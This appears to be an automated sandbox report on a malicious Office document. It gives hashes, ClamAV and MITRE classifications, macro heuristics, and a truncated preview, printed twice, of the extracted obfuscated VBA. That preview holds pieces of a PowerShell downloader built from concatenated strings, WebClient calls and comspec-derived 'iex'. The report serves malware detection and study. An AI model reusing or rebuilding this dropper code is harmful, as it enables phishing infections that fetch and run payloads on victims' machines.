Office (OLE) malware analysis — malicious · 5ac2894d3aa59225

MALICIOUS

Office (OLE)

199.4 KB First seen: 2018-01-23

MD5: 021cf37651dee4f690a971faa547fff2 SHA-1: 8b2cce665df32c0a8fb1dc996a448e63adbf1444 SHA-256: 5ac2894d3aa5922529533fa1d87a0a261851cc88ff8e55c361acbd7ef89a4ecd

182 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1203 Exploitation for Client Execution

The file contains VBA macros, including an AutoOpen macro and a Shell() call, indicating malicious intent. ClamAV detection confirms it as a dropper/phishing lure. The VBA script appears to be obfuscated but likely downloads and executes a second-stage payload, consistent with a macro-based malware delivery.

Heuristics 5

ClamAV: Img.Dropper.PhishingLure-6443153-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Img.Dropper.PhishingLure-6443153-0
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 80336 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	80336 bytes
SHA-256: `7e77356e2e915cf67af740ec088aa3d2c8015915d21f227dcc4d17cb3048c307`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "SNTwjEnGXRiTn" Function tIZpqwIrwK() On Error Resume Next wrwRW = (ARuhhjibNztik - Rnd(43 * Tan(LJaPqfTROvwSZk)) / qbNkJOYd * Oct(QijCrlVbGjNHj) * wWWjDzjPHtPXW / Oct(tbfmjizLwRa - Chr(250) + 581 - ChrB(aWLpXEKnPNm)) - 389 + ViJBXpmTOqi) kJvroT = (FuuknmEiNpu - Rnd(43 * Tan(jQKMYbm)) / zHQrwnXOGnr * Oct(oFLbwSkJBiAN) * tzWzLFK / Oct(JdziDnz - Chr(250) + 581 - ChrB(qYawLNdEi)) - 389 + GrdYRGDpC) taHhjhni = (GMNDwvhmHXdlpk) + Mid("PmZuftAJ+HmRXs0z7Xs0+Xs0huasXs0+Xs0 = S4MwY1Y2cwObnoTrNz3", 9, 31) RPkjEnzuOCV = (DabwnmaEJZY - Rnd(43 * Tan(DRWLNiQf)) / ARBYwoHfGOkoh * Oct(wcLzcnhVvFzz) * SbGfZCpD / Oct(ZZpwSZCK - Chr(250) + 581 - ChrB(XWiaiBinsHiVw)) - 389 + AhpEzjKmrjm) vmaIQhNbG = (ZtzEPwpbzua - Rnd(43 * Tan(FCLdHVjhduNFP)) / jHWSdFiolm * Oct(EZJSsovj) * ztTinFMfwffu / Oct(tPiFfRVKRRZUC - Chr(250) + 581 - ChrB(WPkGSYhXmnniYs)) - 389 + qFGPQft) TkDEKS = (ZbbrsFwlJ - Rnd(43 * Tan(YodzoQdVDbik)) / vofPYJXzLkf * Oct(YFzLumY) * JKwYoVNrnQJ / Oct(pzfDMqXcmiND - Chr(250) + 581 - ChrB(vPLjJIoFHUlpHa)) - 389 + wfMvatM) nizrjqAz = (mKiVITl) + Mid("rdYABzPFJUj39-rEPlACE ([cH'+'Ar]83+[cHAr]122+[cHAr]55),[cHAr]36) SEv& ( Av0Env:cOmSPEc[4,26,25]-JoinXs0Xs'+'0)HmR).RePLace(HmRAv0HmR,HmROMiHmR).RePLace(HmRSEvHmR,[sTRING'+'][CHAR]124)VQP7auE7nZDFkCnwajwzn", 12, 173) DVALwJtapRl = (nIiLXfcuOlIq - Rnd(43 * Tan(NYNVGWduR)) / scGaLSE * Oct(QcfzznMJsJtZ) * PCncjttJJQpVH / Oct(jRERbJwrNlQb - Chr(250) + 581 - ChrB(IwdTArHdaS)) - 389 + iZLdHMpbqCdsns) jzikYi = (EJUInvsvD - Rnd(43 * Tan(wMMqTuUfBKfZT)) / wizotzhWXDKnDw * Oct(qCvrjLzzjz) * TowzkipYK / Oct(zECELboJ - Chr(250) + 581 - ChrB(fqYLKHkhkjA)) - 389 + RofftYYTjzfl) dCPjCcjYVYz = (fwpdzHIw - Rnd(43 * Tan(nCwVkBv)) / lXfEqbibNGmQm * Oct(FaQcPzwquU) * jEPSZmmGWUwFIo / Oct(GCmBWhTOwY - Chr(250) + 581 - ChrB(HlvrvcK)) - 389 + KWSInTzJ) jwPrwiv = (QuXoCLFTl) + Mid("HSvMFPzR3brlJEB5lSr0hrbZO2ranXs0+Xs'+'0dXs0+Xs0om;SXs0+XsHmR'+'+HmR0z7Xs0+Xs0bcd =HmR+HmR XHmR+HmRs0+Xs0KXs0+'+'Xs00K01", 27, 90) pSZtYKNmE = (twsnXjJo - Rnd(43 * Tan(TXudorz)) / FoJdfPXYSDPpzh * Oct(mARJrtMA) * sPVHlPkhTisqb / Oct(NiVPFftwBlLH - Chr(250) + 581 - ChrB(WhHDtoSkQuP)) - 389 + CTiVQpVLUDaW) TYjCnDIljh = (MrjjflMSKKih - Rnd(43 * Tan(CMwcijmuj)) / FjbWJjWEYr * Oct(tkiTYki) * CKqrVITaw / Oct(ipofTdzEPDmoF - Chr(250) + 581 - ChrB(qJJcQJJ)) - 389 + DciNPpFNpFZPuB) vUBiLX = (fwBJwzoF - Rnd(43 * Tan(DMKclvqwITH)) / ZnTUqCLTJOGj * Oct(lrTBXGmQ) * CInRcnF / Oct(ftsaFLhpFvcm - Chr(250) + 581 - ChrB(oFbSzEWukN)) - 389 + UYkLjZZYNc) ptUSZEWr = (GUwtOjwdnNz) + Mid("Avr77iTas0+Xs0lit(K0Xs0+Xs0Q,K0Q);Sz7Xs0+Xs0ka'+'rXs0+Xs0apXs0+XsHmR'+'+HmR0asXs0+Xs0 = SzXs0+Xs07nsaXs0+XHmR+HmRs0'+'daXs0+Xs0sd.next(1, 3HmR+HmRXs0+XaBTDpVf", 9, 143) aifDT = (NQFTUVffN - Rnd(43 * Tan(lBMzqKm)) / fmMBFOKwBNj * Oct(qKotwLLpp) * XwRJdotOzvm / Oct(PPDLLqJVUSzw - Chr(250) + 581 - ChrB(aMTCizzpC)) - 389 + QkwkWFmOl) cRMhjwj = (OoRhhzWqBV - Rnd(43 * Tan(qLMscaWlwA)) / HzjloAP * Oct(AaGzVGijsJWZ) * vzRYIVhjMu / Oct(XNjSzwKW - Chr(250) + 581 - ChrB(PUvkLrmztdc)) - 389 + biMBSNjihF) riZzB = (SuDbaMUvptMAnb - Rnd(43 * Tan(FmPhENWHf)) / dRiiQVuJSRBhu * Oct(atpmMjYCJkO) * EbBjwnYowupQY / Oct(RrUKOYsjGK - Chr(250) + 581 - ChrB(juvOaItPXQ)) - 389 + HjVNJGijE) ouMHDK = (GvZpkAUjUIF) + Mid("w70PNMapJb3iEsp4R5ZsmR+HmRXs0t SyXs0+Xs0stem.NetXs0+Xs0.WXs0+Xs0ebCHmR+HmRlient;Sz7nXs8Kc", 21, 66) VSKqnFz = (fwbHZMjwzAwGb - Rnd(43 * Tan(jMQijmj)) / iwiUQijir * Oct(KfPmkkNlJjdYc) * kzlBPwwSFN / Oct(fYEvENVIF - Chr(250) + 581 - ChrB(vmubjUwdCoJTKk)) - 389 + thOvuraCX) Bssaw = (iLbchGRDCkFlG - Rnd(43 * Tan(SPnkQaJzUWV)) / YqtwnXMVi * Oct(zwcQJrNRrU) * AFHItiEhkqEHSi / Oct(KFwhZkuwRqI - Chr(250) + 581 - ChrB(QSjDfAP)) - 389 + klousHozcs) viYaru = (boMrZjbApC - Rnd(43 * Tan(FLOUdLfGNK)) / VkXXVLH * Oct(jjtvivEBIf) * uCYdRtzoM / Oct(nBDNXTcUCOQsRT - Chr(250) + 5 ... (truncated)

SHA-256: 7e77356e2e915cf67af740ec088aa3d2c8015915d21f227dcc4d17cb3048c307

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "SNTwjEnGXRiTn"
Function tIZpqwIrwK()
On Error Resume Next
wrwRW = (ARuhhjibNztik - Rnd(43 * Tan(LJaPqfTROvwSZk)) / qbNkJOYd * Oct(QijCrlVbGjNHj) * wWWjDzjPHtPXW / Oct(tbfmjizLwRa - Chr(250) + 581 - ChrB(aWLpXEKnPNm)) - 389 + ViJBXpmTOqi)
kJvroT = (FuuknmEiNpu - Rnd(43 * Tan(jQKMYbm)) / zHQrwnXOGnr * Oct(oFLbwSkJBiAN) * tzWzLFK / Oct(JdziDnz - Chr(250) + 581 - ChrB(qYawLNdEi)) - 389 + GrdYRGDpC)
taHhjhni = (GMNDwvhmHXdlpk) + Mid("PmZuftAJ+HmRXs0z7Xs0+Xs0huasXs0+Xs0 = S4MwY1Y2cwObnoTrNz3", 9, 31)
RPkjEnzuOCV = (DabwnmaEJZY - Rnd(43 * Tan(DRWLNiQf)) / ARBYwoHfGOkoh * Oct(wcLzcnhVvFzz) * SbGfZCpD / Oct(ZZpwSZCK - Chr(250) + 581 - ChrB(XWiaiBinsHiVw)) - 389 + AhpEzjKmrjm)
vmaIQhNbG = (ZtzEPwpbzua - Rnd(43 * Tan(FCLdHVjhduNFP)) / jHWSdFiolm * Oct(EZJSsovj) * ztTinFMfwffu / Oct(tPiFfRVKRRZUC - Chr(250) + 581 - ChrB(WPkGSYhXmnniYs)) - 389 + qFGPQft)
TkDEKS = (ZbbrsFwlJ - Rnd(43 * Tan(YodzoQdVDbik)) / vofPYJXzLkf * Oct(YFzLumY) * JKwYoVNrnQJ / Oct(pzfDMqXcmiND - Chr(250) + 581 - ChrB(vPLjJIoFHUlpHa)) - 389 + wfMvatM)
nizrjqAz = (mKiVITl) + Mid("rdYABzPFJUj39-rEPlACE  ([cH'+'Ar]83+[cHAr]122+[cHAr]55),[cHAr]36) SEv& ( Av0Env:cOmSPEc[4,26,25]-JoinXs0Xs'+'0)HmR).RePLace(HmRAv0HmR,HmROMiHmR).RePLace(HmRSEvHmR,[sTRING'+'][CHAR]124)VQP7auE7nZDFkCnwajwzn", 12, 173)
DVALwJtapRl = (nIiLXfcuOlIq - Rnd(43 * Tan(NYNVGWduR)) / scGaLSE * Oct(QcfzznMJsJtZ) * PCncjttJJQpVH / Oct(jRERbJwrNlQb - Chr(250) + 581 - ChrB(IwdTArHdaS)) - 389 + iZLdHMpbqCdsns)
jzikYi = (EJUInvsvD - Rnd(43 * Tan(wMMqTuUfBKfZT)) / wizotzhWXDKnDw * Oct(qCvrjLzzjz) * TowzkipYK / Oct(zECELboJ - Chr(250) + 581 - ChrB(fqYLKHkhkjA)) - 389 + RofftYYTjzfl)
dCPjCcjYVYz = (fwpdzHIw - Rnd(43 * Tan(nCwVkBv)) / lXfEqbibNGmQm * Oct(FaQcPzwquU) * jEPSZmmGWUwFIo / Oct(GCmBWhTOwY - Chr(250) + 581 - ChrB(HlvrvcK)) - 389 + KWSInTzJ)
jwPrwiv = (QuXoCLFTl) + Mid("HSvMFPzR3brlJEB5lSr0hrbZO2ranXs0+Xs'+'0dXs0+Xs0om;SXs0+XsHmR'+'+HmR0z7Xs0+Xs0bcd =HmR+HmR XHmR+HmRs0+Xs0KXs0+'+'Xs00K01", 27, 90)
pSZtYKNmE = (twsnXjJo - Rnd(43 * Tan(TXudorz)) / FoJdfPXYSDPpzh * Oct(mARJrtMA) * sPVHlPkhTisqb / Oct(NiVPFftwBlLH - Chr(250) + 581 - ChrB(WhHDtoSkQuP)) - 389 + CTiVQpVLUDaW)
TYjCnDIljh = (MrjjflMSKKih - Rnd(43 * Tan(CMwcijmuj)) / FjbWJjWEYr * Oct(tkiTYki) * CKqrVITaw / Oct(ipofTdzEPDmoF - Chr(250) + 581 - ChrB(qJJcQJJ)) - 389 + DciNPpFNpFZPuB)
vUBiLX = (fwBJwzoF - Rnd(43 * Tan(DMKclvqwITH)) / ZnTUqCLTJOGj * Oct(lrTBXGmQ) * CInRcnF / Oct(ftsaFLhpFvcm - Chr(250) + 581 - ChrB(oFbSzEWukN)) - 389 + UYkLjZZYNc)
ptUSZEWr = (GUwtOjwdnNz) + Mid("Avr77iTas0+Xs0lit(K0Xs0+Xs0Q,K0Q);Sz7Xs0+Xs0ka'+'rXs0+Xs0apXs0+XsHmR'+'+HmR0asXs0+Xs0 = SzXs0+Xs07nsaXs0+XHmR+HmRs0'+'daXs0+Xs0sd.next(1, 3HmR+HmRXs0+XaBTDpVf", 9, 143)
aifDT = (NQFTUVffN - Rnd(43 * Tan(lBMzqKm)) / fmMBFOKwBNj * Oct(qKotwLLpp) * XwRJdotOzvm / Oct(PPDLLqJVUSzw - Chr(250) + 581 - ChrB(aMTCizzpC)) - 389 + QkwkWFmOl)
cRMhjwj = (OoRhhzWqBV - Rnd(43 * Tan(qLMscaWlwA)) / HzjloAP * Oct(AaGzVGijsJWZ) * vzRYIVhjMu / Oct(XNjSzwKW - Chr(250) + 581 - ChrB(PUvkLrmztdc)) - 389 + biMBSNjihF)
riZzB = (SuDbaMUvptMAnb - Rnd(43 * Tan(FmPhENWHf)) / dRiiQVuJSRBhu * Oct(atpmMjYCJkO) * EbBjwnYowupQY / Oct(RrUKOYsjGK - Chr(250) + 581 - ChrB(juvOaItPXQ)) - 389 + HjVNJGijE)
ouMHDK = (GvZpkAUjUIF) + Mid("w70PNMapJb3iEsp4R5ZsmR+HmRXs0t SyXs0+Xs0stem.NetXs0+Xs0.WXs0+Xs0ebCHmR+HmRlient;Sz7nXs8Kc", 21, 66)
VSKqnFz = (fwbHZMjwzAwGb - Rnd(43 * Tan(jMQijmj)) / iwiUQijir * Oct(KfPmkkNlJjdYc) * kzlBPwwSFN / Oct(fYEvENVIF - Chr(250) + 581 - ChrB(vmubjUwdCoJTKk)) - 389 + thOvuraCX)
Bssaw = (iLbchGRDCkFlG - Rnd(43 * Tan(SPnkQaJzUWV)) / YqtwnXMVi * Oct(zwcQJrNRrU) * AFHItiEhkqEHSi / Oct(KFwhZkuwRqI - Chr(250) + 581 - ChrB(QSjDfAP)) - 389 + klousHozcs)
viYaru = (boMrZjbApC - Rnd(43 * Tan(FLOUdLfGNK)) / VkXXVLH * Oct(jjtvivEBIf) * uCYdRtzoM / Oct(nBDNXTcUCOQsRT - Chr(250) + 5
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.